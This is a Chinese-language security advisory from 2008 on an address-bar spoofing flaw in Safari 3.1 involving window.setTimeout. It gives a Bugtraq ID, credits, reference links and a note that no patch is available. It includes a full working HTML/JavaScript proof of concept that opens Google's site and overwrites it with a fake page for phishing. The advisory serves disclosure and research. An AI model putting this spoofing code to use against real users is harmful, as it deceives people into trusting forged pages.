Apple Safari Window.setTimeout变量内容欺骗漏洞
发布日期:2008-03-22
更新日期:2008-03-24
受影响系统:Apple Safari 3.1
描述:
BUGTRAQ ID:
28405
Safari是苹果家族操作系统默认所捆绑的WEB浏览器。
Safari的Window.setTimeout变量没有正确地切换页面之间的导航,攻击者可能强制浏览器打开一个站点的窗口,而用其他函数覆盖页面的内容,这样就可以欺骗地址栏,执行网络钓鱼攻击。
<*来源:Juan Pablo Lopez Yacubian (
jplopezy@gmail.com)
链接:
http://marc.info/?l=bugtraq&m=120621061225969&w=2
http://secunia.com/advisories/29483/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian
<html>
<head>
<title>Recipe 6.6</title>
<script type="text/javascript">
var newWindow;
function makeNewWindow() {
if (!newWindow || newWindow.closed) {
newWindow = window.open('
http://www.google.com.ar/','_self');
setTimeout("writeToWindow()", 50);
} else if (newWindow.focus) {
newWindow.focus();
}
}
function writeToWindow() {
var newContent = "<html><head><title>Google</title></head>";
newContent += "<body>
<h1>FAKE PAGE</h1>";
newWindow.document.write(newContent);
newWindow.document.close();
}
</script>
</head>
<body>
<form>
<input type="button" value="test spoof!" onclick="makeNewWindow();"/>
</form>
</body>
</html>
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.apple.com浏览次数:3230
严重程度:0(网友投票)
